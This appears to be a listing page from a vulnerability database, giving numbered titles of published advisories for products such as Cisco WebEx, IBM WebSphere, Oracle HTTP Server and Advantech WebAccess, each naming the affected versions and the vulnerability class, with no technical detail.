[69437] KnowledgeTree 3.7/3.7.0.1/3.7.0.2 WebService getFileName sql injection [69429] Craig Knudsen WebCalendar up to 1.2.6 category.php cross site scripting [69323] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx unknown vulnerability [69322] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx information disclosure [69321] Advantech WebAccess 5.0/6.0/7.0/7.1 ActiveX Control bwocxrun.ocx information disclosure [69320] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69319] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69318] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69317] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69316] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69315] Advantech WebAccess 5.0/6.0/7.0/7.1 memory corruption [69314] Advantech WebAccess 5.0/6.0/7.0/7.1 DBVisitor.dll sql injection [69312] Websense Triton Web Filter up to 7.7.2 Settings Module privilege escalation [69203] Cisco Web Security Appliance URL privilege escalation [69196] Cisco Web Security Appliance Proxy Engine information disclosure [69194] Cisco Web Security Appliance Administrator Report Page cross site scripting [69188] Netgear WNDR Router SOAP Interface Password information disclosure [69173] Webmin 1.720 Read Mail Module File privilege escalation [69171] Cisco ASA WebVPN denial of service [69103] Cisco TelePresence IX5000 Web Portal privilege escalation [69062] Cisco WebEx Meetings Server 1.0/1.1/1.5 privilege escalation [69032] Cisco WebEx Meetings Server information disclosure [69018] Cisco WebEx Meeting Center T29.6 Session information disclosure [69016] Cisco WebEx Meetings Server 1.5 Invite List privilege escalation [69013] Cisco WebEx Meeting Center T29.11 fileURI information disclosure [68999] Cisco WebEx Meetings Server 1.5 Username information disclosure [68998] Cisco WebEx Meetings Server 1.5 Orion Admin cross site request forgery [68997] Cisco WebEx Meetings Server 1.5 XML API LstsummarySession information disclosure [68725] Oracle Siebel UI Framework 8.1.1/8.2.2 AX/HI Web UI unknown vulnerability [68705] Oracle E-Business Suite up to 12.2.4 Web Applications Desktop Integrator unknown vulnerability [68692] Oracle Enterprise Manager Ops Center 11.1.3/12.1.4 User Interface Framework unknown vulnerability [68681] Oracle Business Intelligence Enterprise Edition 10.1.3.4.2/11.1.1.7 Analytics Web General information disclosure [68680] Oracle WebCenter Content 11.1.1.8.0 unknown vulnerability [68677] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener denial of service [68676] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption [68675] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener parser.c xmlParserHandlePEReference denial of service [68669] Oracle WebLogic Server 10.0.2.0/10.3.6.0/12.1.1.0/12.1.2.0 CIE Related Components information disclosure [68668] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation [68667] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation [68666] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener privilege escalation [68665] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption [68659] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener memory corruption [68658] Oracle HTTP Server 10.1.3.5.0/11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener mod_status.c lua_ap_scoreboard_worker race condition [68657] Oracle WebLogic Server 10.3.6.0/12.1.1.0/12.1.2.0/12.1.3.0 WLS Config/WLS Console privilege escalation [68656] Oracle WebLogic Portal 10.0.1.0/10.2.1.0/10.3.6.0 Third Party Tools commons-beanutils-1.8.0.jar privilege escalation [68650] Oracle HTTP Server 11.1.1.7.0/12.1.2.0/12.1.3.0 Web Listener Numeric Error [68616] Cisco WebEx Meetings Server 1.5 Login Page Captcha privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68571] Citrix Netscaler 10.0/10.1/10.5 Management Interface memory corruption [68526] Cisco WebEx Meetings Server 1.5 URL weak authentication [68525] Cisco WebEx Meetings Server 1.5 sendPwMail.do OutlookAction information disclosure [68524] Cisco WebEx Meetings Server 1.5 cross site request forgery [68523] Cisco WebEx Meetings Server 1.5 sendPwMail.do cross site scripting [68492] Digium Asterisk up to 13.0.1 WebSocket Server denial of service [66740] IBM Websphere Mq Internet Pass Thru Administration denial of service [66704] McAfee Web Gateway up to 7.4.0 Web Filtering Port directory traversal [66673] IBM InfoSphere Information Server up to 9.1.2 Interfaces cross site scripting [66672] IBM InfoSphere Information Server up to 9.1.2 Interfaces sql injection [66518] IBM WebSphere Portal up to 8.0.0.1 privilege escalation [66489] IBM WebSphere MQ up to 7.4 directory traversal [66425] IBM WebSphere eXtreme Scale Client up to 8.6.0.4 Web Container privilege escalation [66370] IBM Connections Portlets up to 4.4 IBM WebSphere Portal cross site scripting [66369] IBM WebSphere Dashboard Framework 7.0.1 privilege escalation [66368] IBM WebSphere Portal up to 8.0.0.1 privilege escalation [66291] Lexmark C935dn Lc.jo.p091 Embedded Web Server cross site scripting [66204] GE up to 8.1 CimWebServer.exe directory traversal [66203] GE up to 8.2 Web Components gefebt.exe directory traversal [65977] web2ldap up to 1.1.48 Administration cross site scripting [65903] HP Service Manager Web Tier up to 9.20 cross site scripting [65902] HP Service Manager Web Tier up to 9.20 memory corruption [65807] IBM Security Access Manager For Web 6.1 weak encryption [65801] Cisco WebEx Training Center privilege escalation [65795] Cisco WebEx Training Center information disclosure [65794] Cisco WebEx Training Center information disclosure [65793] Cisco WebEx Training Center privilege escalation [65792] Cisco WebEx Meeting Center Error Message information disclosure [65791] Cisco WebEx Training Center privilege escalation [65790] Cisco WebEx Training Center information disclosure [65789] Cisco WebEx Sales Center Subsystem privilege escalation [65788] Cisco WebEx Training Center Access Restriction privilege escalation [65787] Cisco WebEx Meeting Center privilege escalation [65786] Cisco WebEx Training Center cross site scripting [65785] Cisco WebEx Meeting Center Subsystem cross site scripting [65784] Cisco WebEx Meeting Center cross site scripting [65783] Cisco WebEx Meeting Center cross site scripting [65782] Cisco WebEx Sales Center privilege escalation [65781] Cisco WebEx Sales Center cross site scripting [65780] Cisco WebEx Training Center cross site request forgery [65779] Cisco WebEx Training Center Access Restriction information disclosure [65757] SAP Network Interface Router 39.3 weak authentication [65708] Enorth Webpublisher CMS up to 5.0 sql injection [65644] Cybozu Garoon up to 3.7 User Interface cross site scripting [65512] SAP Network Interface Router 7.30 memory corruption [65438] Juniper Junos up to 12.3 J-Web privilege escalation [65403] Openbravo Openbravo ERP up to 2.50 Interfaces privilege escalation [65326] Cisco Unity Connection Web Service directory traversal [65302] IBM WebSphere eXtreme Scale 8.6.0 Monitoring privilege escalation [65301] IBM WebSphere eXtreme Scale 8.6.0 Monitoring unknown vulnerability [65300] IBM WebSphere eXtreme Scale 8.6.0 Monitoring cross site scripting [65216] Cisco Unified Computing System Management Interface cross site request forgery [65177] Cisco Wireless LAN Controller Management Interface cross site scripting [65170] Cisco Unified Computing System Management Interface privilege escalation [65168] Cisco Unified Communications Domain Manager Web Framework sql injection [65166] IBM InfoSphere Information Server up to 8.1 Web Console privilege escalation [65112] IBM Rational ClearQuest up to 7.1.0.0 Web Client information disclosure [65061] Red Hat libvirt 1.0.6 Interfaces denial of service [65046] IBM Websphere Datapower Xc10 Appliance up to 2.1.0.3 privilege escalation [65037] Cisco Unified Computing System Management Interface privilege escalation [65030] Open-Xchange AppSuite 7.0.1/7.0.2/7.2.0/7.2.1 Interfaces information disclosure [65011] Cisco Unified Computing System Intelligent Platform Management Interface privilege escalation [64987] Cisco up to 8.5 Web Framework weak authentication [64859] Cisco WebEx Recording Format Player up to 27.25.9 Exception memory corruption [64836] Palo Alto PAN-OS up to 4.1.3 Web Management weak authentication [64742] Advantech WebAccess 5.0/6.0/7.0 cross site scripting [64673] IBM InfoSphere Information Server up to 8.1 Web Console cross site scripting [64672] IBM InfoSphere Information Server up to 8.1 User Interface cross site scripting [64609] Cisco Unified Communications Manager Web Portal information disclosure [64595] GE up to 8.1 CimWebServer.exe memory corruption [64536] Cisco Unified MeetingPlace Web Conferencing Access Restriction privilege escalation [64508] WordPress up to 3.3.1 swfupload.swf "ExternalInterfacecall" cross site scripting [64469] Cisco Unified MeetingPlace Web Conferencing cross site scripting [64468] Cisco Unified Communications Domain Manager Management Interface denial of service [64335] Cisco Prime Central for Hosted Collaboration Solution Web Framework information disclosure [64317] IBM Sterling Connect Direct User Interface up to 1.4.0.10 privilege escalation [64132] Netweblogic Login With Ajax up to 2.0 cross site request forgery [64129] EMC Documentum Webtop up to 6.6 privilege escalation [64128] EMC Documentum Webtop up to 6.6 cross site scripting [64127] EMC Documentum Webtop up to 6.6 weak authentication [64064] HP Service Manager Web Tier up to 9.30 cross site scripting [64063] HP Service Manager Web Tier up to 9.30 information disclosure [64044] Cisco Unified Communications Domain Manager Web Framework cross site scripting [64043] IBM Lotus Sametime up to 8.5.1 Web Client unknown vulnerability [63859] Moodle up to 2.4.1 WebDAV lib.php information disclosure [63840] IBM Rational ClearQuest up to 8.0.0.0 Web Client cross site scripting [63689] IBM Tivoli Application Dependency Discovery Manager User Interface Welcome.do cross site scripting [63685] Thekelleys Dnsmasq up to 2.63 Interfaces denial of service [63684] Thekelleys Dnsmasq up to 2.32 Interfaces denial of service [63520] Cisco Webex Social search information disclosure [63488] Samba up to 3.5.18 Web Administration Tool privilege escalation [63429] TP-LINK TL-WR841N -/3.13.9 Management Interface directory traversal [63386] Cisco WebEx Training Center privilege escalation [63385] Cisco WebEx Training Center privilege escalation [63378] Cisco NX-OS on Nexus 7000 Interfaces denial of service [63361] GE up to 8.0 CimWebServer.exe Numeric Error [63360] Cisco WebEx Training Center testingLibraryAction.do cross site request forgery [63229] Oracle Glassfish Web Space Server10.0 directory traversal [63224] IBM WebSphere Application Server privilege escalation [63219] IBM Rational ClearQuest up to 7.1.1 Web Client cross site scripting [63215] Cisco 2100 Wireless LAN Controller 7.2.110.0 web_auth_custom.html denial of service [63167] KENT-WEB ACCESS REPORT up to 5.02 Web Access cross site scripting [63166] KENT-WEB ACCESS REPORT up to 4.2 Web Access cross site scripting [63103] Ps Project Management Team libunity-webapps up to 2.4.0 Hash Tables denial of service [62760] Cisco WebEx Recording Format Player up to 27.25.9 memory corruption [62687] Craig Knudsen WebCalendar up to 1.2.4 privilege escalation [62686] Craig Knudsen WebCalendar edit_entry_handler.php cross site scripting [62648] TinyWebGallery 1.8.3 memory corruption [62622] K5n WebCalendar 1.2.4 cross site scripting [62597] SpamTitan WebTitan 3.50 logs-x.php directory traversal [62596] SpamTitan WebTitan 3.50 traceroute tools.php privilege escalation [62595] SpamTitan WebTitan 3.50 Login login-x.php sql injection [62545] Akiva WebBoard 2.90/8.0 sql injection [62430] IBM WebSphere Commerce denial of service [62429] IBM WebSphere Commerce 7.0 denial of service [62337] Moodle up to 2.3.1 WebService webservice/lib.php privilege escalation [62241] Gentoo Webmin up to 1.590 cross site request forgery [62114] Litespeedtech LiteSpeed Web Server 4.1.11 cross site scripting [62103] Com Weblinks up to 1.0.9 on Joomla sql injection [61956] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [61875] Websense Web Security denial of service [61874] Websense Email Security up to 6.0 Access Restriction privilege escalation [61873] Websense Email Security up to 6.0 memory corruption [61777] Kajianwebsite CMS Balitbang 3.0 alumni.php sql injection [61768] Websense Web Security up to 6.3.2 Management Console weak authentication [61766] Websense Web Security up to 6.3.2 denial of service [61765] Websense Web Security information disclosure [61764] Websense Web Security up to 6.3.2 denial of service [61762] Websense Web Security memory corruption [61761] Websense Web Security up to 6.3.3 Monitoring privilege escalation [61760] Websense Email Security up to 7.0 information disclosure [61759] Websense Email Security up to 7.0 privilege escalation [61758] Websense Web Security 7.0 Default Configuration [61757] Websense Web Security 7.0 Default Configuration [61682] IBM Rational ClearQuest up to 7.1.1 Web Client cross site scripting [61611] Netweblogic Login With Ajax up to 2.1.0 cross site scripting [61571] C4B Xphone Unified Communications 2011 4.1.890s Web Frontend cross site scripting [61544] WinWebMail WinWebMail Server 3.8.1.6 cross site scripting [61472] Siemens Synco OZW Web Server up to Ozw772.249 Default Password privilege escalation [61455] Dell Sonicwall Scrutinizer With Flow Analytics Module up to 8.6.1 Web Console cross site scripting [61450] Dell Sonicwall Scrutinizer With Flow Analytics Module up to 8.6.1 Web Console cross site scripting [61447] IBM Scale Out Network Attached Storage up to 1.3.1 Command Line Interface privilege escalation [61357] IBM Lotus Protector for Mail Security 2.8 User Interface cross site scripting [61344] Moodle up to 2.1.2 User Interface mod/wiki/pagelib.php information disclosure [61318] Moodle up to 2.2 WebService Configuration [61298] Moodle up to 1.9.11 lib/weblib.php cross site scripting [61222] KENT-WEB YY-BOARD 6.3 cross site scripting [61141] Cisco Webex Advanced Recording Format Player up to 27.25.10 memory corruption [61079] IBM Lotus Expeditor up to 6.2.2 Web Container privilege escalation [61056] Cms-center Simple Web Content Management System 1.1 item_delete.php sql injection [61032] IBM WebSphere Application Server up to 7.0.0.14 Administration Console cross site scripting [61031] IBM WebSphere Application Server up to 7.0.0.14 weak authentication [61030] IBM WebSphere Application Server up to 7.0.0.14 Administration Console cross site scripting [60988] Dolphin-browser Dolphin Browser HD webView Class information disclosure [60817] Netweblogic Login With Ajax up to 2.1.0 login-with-ajax.php cross site scripting [60816] Schneider Electric Kerweb 3.0 kw.dll cross site scripting [60657] IBM WebSphere Application Server up to 6.1.0.11 weak encryption [60450] Iwork WebGlimpse up to 2.2.2 WebGL wgarcmin.cgi directory traversal [60449] Iwork WebGlimpse up to 2.2.2 wgarcmin.cgi cross site scripting [60448] Iwork WebGlimpse up to 2.2.2 Installation wgarcmin.cgi information disclosure [60345] Cisco 2106 Wireless Lan Controller Management Interface denial of service [60306] IBM WebSphere Application Server 7.2 cross site scripting [60302] Advantech WebAccess 5.0/6.0 cross site request forgery [60301] Advantech WebAccess 5.0/6.0 sql injection [60300] Advantech WebAccess 5.0/6.0 sql injection [60299] Advantech WebAccess 5.0/6.0 ActiveX Control bwocxrun.ocx memory corruption [60298] Advantech WebAccess 5.0/6.0 Format String [60297] Advantech WebAccess 5.0/6.0 memory corruption [60296] Advantech WebAccess 5.0/6.0 GbScriptAddUp.asp weak authentication [60295] Advantech WebAccess 5.0/6.0 uaddUpAdmin.asp weak authentication [60294] Advantech WebAccess 5.0/6.0 opcImg.asp memory corruption [60293] Advantech WebAccess 5.0/6.0 memory corruption [60292] Advantech WebAccess 5.0/6.0 information disclosure [60291] Advantech WebAccess 5.0/6.0 cross site request forgery [60290] Advantech WebAccess 5.0/6.0 sql injection [60289] Advantech WebAccess 5.0/6.0 cross site scripting [60286] Advantech WebAccess 5.0/6.0 ActiveX Control memory corruption [60285] Advantech WebAccess 5.0/6.0 privilege escalation [60284] Advantech WebAccess 5.0/6.0 memory corruption [60283] Advantech WebAccess 5.0/6.0 bwview.asp cross site scripting [60282] Advantech WebAccess 5.0/6.0 bwerrdn.asp cross site scripting [60281] Advantech WebAccess 5.0/6.0 sql injection [60202] PHP-Nuke Web Links Module modules.php sql injection [60193] Helmut Hummel Typo3 Webservice up to 0.3.5 WebService memory corruption [60137] EPiServer CMS up to 6.1.379.0 Admin Interface cross site scripting [60115] Sphinx-soft Mobile Web Server 3.1.2.47 cross site scripting [60105] Siemens SIMATIC HMI panel miniweb.exe privilege escalation [60104] Siemens SIMATIC HMI panel miniweb.exe directory traversal [59980] Horde Groupware Webmail Edition up to 1.2.8 cross site scripting [59936] IBM WebSphere Application Server up to 6.1.0.10 Web Services Security cross site scripting [59935] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting [59902] Apache Struts up to 2.2.3 Interfaces privilege escalation [59893] Red Hat JBoss Operations Network up to 2.2 Administration Interface cross site scripting [59833] Yaws Web Server 1.88 cross site scripting [59827] GoAhead WebServer denial of service [59637] Monoxide0184 Oxide WebServer directory traversal [59629] phpWebSite up to 0.10.2 cross site scripting [59626] Red Hat FreeIPA up to 2.1.3 Management Interface cross site request forgery [59529] IBM Ts3100 Tape Library User Interface weak authentication [59362] GoAhead Webserver 2.1.8 cross site scripting [59275] Wikiwebhelp Wiki Web Help 0.28 sql injection [59262] phpMyAdmin up to 3.4.5.0 Setup Interface cross site scripting [59251] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting [59250] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [59248] IBM WebSphere Application Server information disclosure [59247] IBM WebSphere MQ up to 7.0.1.2 denial of service [59240] IBM WebSphere ILOG Rule Team Server 7.1.1 cross site scripting [59238] Cisco WebEx Recording Format Player up to 27.9 memory corruption [59237] Cisco WebEx Recording Format Player up to 27.9 memory corruption [59209] Webcreate Webforum 5.1 cross site scripting [59208] IBM WebSphere ILOG Rule Team Server 7.1.1 cross site scripting [59207] Webcreate Webforum 5.1 cross site scripting [59206] Webcreate Webforum 5.1 cross site scripting [59204] Webcreate Webforum 5.1 cross site scripting [59139] Oracle Java System Application Server 8.1 Web Container unknown vulnerability [59123] Oracle Siebel CRM 8.1.1 User Interface unknown vulnerability [59121] Oracle Fusion Middleware 10.1.3.5.1 Web Services Manager unknown vulnerability [59117] Oracle Siebel CRM 8.0.0 User Interface unknown vulnerability [59085] Oracle Fusion Middleware 10.1.3.5 Web Services Manager unknown vulnerability [58955] Com Weblinks on Joomla index.php sql injection [58917] WebManager-Pro CMS WebManager-Pro up to 7.4.3 c.php privilege escalation [58916] WebManager-Pro CMS WebManager-Pro up to 7.4.2 c.php sql injection [58906] Novell GroupWise 8.0 WebAccess cross site scripting [58852] webSPELL 4.2.1 asearch.php sql injection [58765] Webminimalist Web Minimalist 200901 index.php cross site scripting [58717] WEBinsta mailing list manager 1.3e Error Message information disclosure [58715] K5n WebCalendar 1.2.3 Error Message information disclosure [58711] TinyWebGallery 1.8.3 Error Message information disclosure [58636] Escortwebsitedesign escort-agency-cms Error Message information disclosure [58596] 111WebCalendar 1.2.3 Error Message information disclosure [58575] IBM WebSphere Commerce up to 6.0.0.11 weak authentication [58564] IBM Lotus Domino 8.5.2 WebAdmin Nnotes.dll NSFComputeEvaluateExt memory corruption [58434] IBM WebSphere Application Server up to 6.1.0.10 Administration Console directory traversal [58261] IBM WebSphere Service Registry/Repository up to 7.0.0.3 agentDetect.jsp cross site scripting [58199] shttpd 1.42 Embedded Web Server mongoose.c _shttpd_put_dir memory corruption [58136] Samba up to 3.2.12 Web Administration Tool chg_passwd cross site scripting [58135] Samba up to 3.2.12 Web Administration Tool cross site request forgery [57966] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [57959] IBM WebSphere Application Server up to 6.1.0.11 Administrative Console cross site request forgery [57955] IBM Tivoli Directory Server up to 6.2.0.1 Web Administration Tool information disclosure [57954] IBM Tivoli Directory Server up to 6.2.0.1 Web Administration Tool weak authentication [57950] IBM WebSphere Portal up to 7.0.0.0 cross site scripting [57904] Symantec Web Gateway 4.5.1.44 forget.php sql injection [57887] IBM WebSphere MQ up to 7.0.1.2 privilege escalation [57691] Microsoft SQL Server 2008 Web Service information disclosure [57582] Imperva SecureSphere Web Application Firewall 7.0 cross site scripting [57557] Webmin up to 1.530 useradmin/user-lib.pl cross site scripting [57531] IBM WebSphere Portal up to 7.0.0.0 denial of service [57530] IBM WebSphere Portal up to 7.0.0.0 cross site scripting [57343] IBM WebSphere Application Server up to 6.1.0.10 Encryption Algorithm weak encryption [57262] Digium Asterisk up to C.1.5 Manager Interface manager.c privilege escalation [57256] Digium Asterisk up to C.1.5 Interfaces denial of service [57071] IBM WebSphere Application Server up to 6.0.1.11 privilege escalation [56809] OTRS up to 2.3.4 webscript.pl privilege escalation [56782] IBM Tivoli Netcool/OMNIbus up to 7.1.0.12 Web GUI sql injection [56778] IBM WebSphere Application Server up to 6.1.0.36/7.0.0.14 denial of service [56777] IBM WebSphere Application Server up to 6.1.0.36/7.0.0.14 privilege escalation [56776] IBM WebSphere Application Server up to 6.1.0.34/7.0.0.14 privilege escalation [56775] IBM WebSphere Application Server up to 6.1.0.34/7.0.0.14 denial of service [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service [56773] IBM WebSphere Application Server up to 6.1.0.10/7.0.0.14 com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl denial of service [56772] IBM WebSphere Application Server up to 6.1.0.10 Session Initiation Protocol denial of service [56771] IBM WebSphere Application Server up to 6.1.0.10 denial of service [56770] IBM WebSphere Application Server up to 6.1.0.10 denial of service [56769] IBM WebSphere Application Server up to 6.1.0.10 getACRWorkElementPtr denial of service [56768] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console privilege escalation [56767] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [56765] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [56764] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting [56618] Cisco TelePresence Multipoint Switch 1.6.x RMI Interface denial of service [56611] Cisco TelePresence Manager up to 1.6.2 RMI Interface privilege escalation [56547] Cgiirc CGI:IRC up to 0.5.8 Interfaces interfaces/nonjs.pm cross site scripting [56492] IBM WebSphere Application Server 6.1.0.9 privilege escalation [56373] SMC Networks Smcd3g-ccr Firmware up to 1.4.0.41 Web Management weak encryption [56320] Cisco WebEx Meeting Center memory corruption [56319] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption [56318] Cisco Webex Advanced Recording Format Player up to 26.48 atas32.dll memory corruption [56317] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption [56316] Cisco Webex Advanced Recording Format Player up to 26.48 memory corruption [56315] Cisco Webex Advanced Recording Format Player up to 26.48 atas32.dll memory corruption [56273] Novell GroupWise up to 8.0.2 WebAccess directory traversal [56194] AWBS Advanced Webhost Billing System 2.1.1 cart.php sql injection [56144] Oracle Supply Chain Products Suite 9.3.1 Web Client unknown vulnerability [56086] Symantec Web Gateway up to 4.5.0.326 Management Console login.php sql injection [56048] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe stringToSeconds memory corruption [56031] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console privilege escalation [56030] IBM WebSphere Application Server up to 6.1.0.10 cross site scripting [56029] IBM WebSphere MQ up to 7.0.1.2 memory corruption [55863] IBM Rational ClearQuest up to 7.1.1 Web Client privilege escalation [55861] IBM Rational ClearQuest up to 7.1.1 Web Client information disclosure [55829] IBM WebSphere Service Registry/Repository privilege escalation [55649] Bsdperimeter pfSense 2.0 Interfaces pkg_edit.php cross site scripting [55626] IBM WebSphere Commerce up to 7.0.0.0 information disclosure [55442] IBM WebSphere MQ up to 7.0.1.2 denial of service [55426] IBM WebSphere MQ up to 6.0.2.2 weak encryption [55409] IBM WebSphere Application Server up to 7.0.0.11 Administrative Console cross site scripting [55408] IBM WebSphere Portal 6.1.0.1 cross site scripting [55398] IBM WebSphere Commerce cross site scripting [55397] IBM WebSphere Commerce up to 6.0.0.6 JavaServer Pages sql injection [55396] IBM WebSphere Application Server up to 7.0.0.11 Web Services Security privilege escalation [55395] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site request forgery [55394] IBM WebSphere Application Server up to 7.0.0.11 Administrative Console cross site scripting [55393] IBM WebSphere Application Server up to 6.1.0.10 Administrative Console cross site scripting [55327] Yaws Web Server 1.89 directory traversal [55161] IBM WebSphere MQ up to 7.0.1.1 weak authentication [54841] Salvo Tomaselli Weborf HTTP Server up to 0.12.2 instance.c modURL directory traversal [54795] IBM WebSphere Application Server up to 6.1.0.2 Administrative Console denial of service [54723] IBM Lotus Sametime up to 1.4 WebContainer unknown vulnerability [54617] Microsoft Outlook Web Access up to 2007 cross site request forgery [54576] IBM WebSphere Application Server up to 6.1.0.11 privilege escalation [54491] Jrbcs Webform report 5.x-2.6 cross site scripting [54486] Websitesrus Accessories Me PHP Affiliate Script 1.4 browse.php sql injection [54485] Websitesrus Accessories Me PHP Affiliate Script 1.4 search.php cross site scripting [54318] Microsoft .NET Framework 2.0 SP1/2.0 SP2/3.5/3.5 SP1/3.5.1 Interfaces privilege escalation [54308] nessus Web Server plugin 1.2.4 feed information disclosure [54304] IBM WebSphere Service Registry/Repository 6.3.0 cross site scripting [54263] HP OpenView Network Node Manager 7.53 webappmon.exe memory corruption [54213] nessus Web Server plugin 1.2.4 cross site scripting [54147] HP OpenView Network Node Manager 7.53 webappmon.exe execvp_nc memory corruption [54120] Websedit Sk Calendar sql injection [54071] Oracle Sun Java System Web Proxy Server 4.0.13 Administration Server unknown vulnerability [54061] Oracle WebLogic Server 10.3.2 unknown vulnerability [53998] Internetdm WebDM CMS cont_form.php sql injection [53976] Joomla CMS Weblinks index.php sql injection [53855] Cisco ASA 5580 up to 8.1.1 WebVPN privilege escalation [53838] Moodle up to 1.9.0 lib/weblib.php cross site scripting [53798] Salvo Tomaselli Weborf HTTP Server up to 0.12.1 Connection Header privilege escalation [53795] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting [53794] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting [53779] IBM WebSphere ILOG JRules 6.7 cross site scripting [53729] Litespeedtech LiteSpeed Web Server information disclosure [53724] IBM WebSphere Application Server up to 7.0.0.0 denial of service [53723] ibm WebSphere Application Server up to 6.1.0.10 mod_ibm_ssl privilege escalation [53722] IBM WebSphere Application Server up to 7.0.0.0 on z/OS information disclosure [53721] IBM WebSphere Application Server up to 7.0.0.0 Administrative Console cross site scripting [53720] IBM WebSphere Application Server up to 7.0.0.0 cross site scripting [53719] IBM WebSphere Application Server up to 7.0.0.0 information disclosure [53700] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe main memory corruption [53616] Accoria Rock Web Server 1.4.7 authcfg.cgi Format String [53615] Accoria Rock Web Server 1.4.7 weak encryption [53614] Accoria Rock Web Server 1.4.7 loadstatic.cgi directory traversal [53613] Accoria Rock Web Server 1.4.7 authcfg.cgi cross site request forgery [53612] Accoria Rock Web Server 1.4.7 loadstatic.cgi cross site scripting [53534] Salvo Tomaselli Weborf HTTP Server up to 0.12.0 Range Header privilege escalation [53531] HP OpenView Network Node Manager 7.53 ovwebsnmpsrv.exe sprintf memory corruption [53530] HP OpenView Network Node Manager 7.53 Error ovwebsnmpsrv.exe memory corruption [53445] Nitropowered NITRO Web Gallery 1.4 index.php sql injection [53396] Timo Gaik Webby Webserver 1.01 memory corruption [53385] Microsoft Exchange Server 2007 Outlook Web Access cross site scripting [53234] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [53233] IBM WebSphere Application Server up to 6.1.0.10 privilege escalation [53232] IBM WebSphere Application Server up to 6.1.0.10 denial of service [53231] IBM WebSphere Application Server up to 6.1.0.10 Access Restriction privilege escalation [53171] Phpscripte24 Web Social Network Freunde Community 2.0 user.php sql injection [52996] Moodle up to 1.9.7 weblib.php fix_non_standard_entities cross site scripting [52956] Red Hat JBoss Enterprise Application Platform Web Console 4.2.0.CP09 privilege escalation [52949] IBM WebSphere MQ up to 7.0.0 denial of service [52890] Sharing-file Easy File Sharing Web Server 4.8 directory traversal [52789] Imperva SecureSphere Web Application Firewall up to 6.2.0.6442 unknown vulnerability [52784] Oracle Collaboration Suite 10.1.2.4 User Interface unknown vulnerability [52783] Oracle Weblogic Server Component 9.2 privilege escalation [52668] IBM WebSphere Portal up to 6.1.0.1 unknown vulnerability [52647] Joomlamo Com Weberpcustomer up to 1.2.0 weberpcustomer.php directory traversal [52599] Kjetiltroan WebMaid CMS up to 0.2-6 cContactus.php directory traversal [52598] Kjetiltroan WebMaid CMS up to 0.2-6 cContactus.php privilege escalation [52539] IBM WebSphere Application Server up to 6.1.0.10 denial of service [52537] IBM WebSphere Application Server up to 6.1.0.10 Administration Console cross site scripting [52536] VMware ESX Server 2.0.0 WebAccess privilege escalation [52535] VMware ESX Server 3.5 WebAccess cross site scripting [52428] IBM WebSphere Application Server up to 7.0.0.0 Administrative Console unknown vulnerability [52356] Comscripts Web Server Creator Web Portal 0.1 directory traversal [52355] Comscripts Web Server Creator Web Portal 0.1 index.php privilege escalation [52354] Comscripts Web Server Creator Web Portal 0.1 index.php cross site scripting [52220] Joomlamo Com Cartweberp 1.56.75 index.php directory traversal [52134] Resalecode PHP Shopping Cart Selling Website Script index.php sql injection [52133] Resalecode PHP Shopping Cart Selling Website Script index.php cross site scripting [52051] Novell GroupWise 7.0/7.01/7.03/8.0 WebAccess cross site scripting [52040] IBM Lotus iNotes up to 229.260 Domino Web Access cross site request forgery [52039] IBM Lotus iNotes up to 229.260 Domino Web Access cross site scripting [52038] IBM Lotus iNotes up to 229.210 Domino Web Access memory corruption [52037] IBM Lotus iNotes up to 229.260 Domino Web Access unknown vulnerability [51994] IBM Lotus Workplace Web Content Management up to 6.1.0.0 IBM WebSphere Portal login.jsp unknown vulnerability [51993] IBM Lotus Workplace Web Content Management up to 6.1.0.0 IBM WebSphere Portal login.jsp cross site scripting [51987] Novell eDirectory 8.8.5 Web Service weak encryption [51973] Sun One Web Server up to 6.0 denial of service [51972] Sun One Web Server denial of service [51968] IBM WebSphere Portal 6.0.1.5 cross site scripting [51895] Accellion Secure File Transfer Appliance web_client_user_guide.html directory traversal [51858] K5n WebCalendar 1.2.0 cross site request forgery [51847] K5n WebCalendar 1.2.0 cross site request forgery [51846] K5n WebCalendar 1.2.0 users.php cross site scripting [51779] IBM WebSphere Application Server up to 7.0.0.1 SSL information disclosure [51764] IBM WebSphere Commerce 7.0 Encryption weak encryption [51761] Alentum Weblog Expert cross site scripting [51755] Sun One Web Server 6.0 Numeric Error [51754] Sun One Web Server up to 6.0 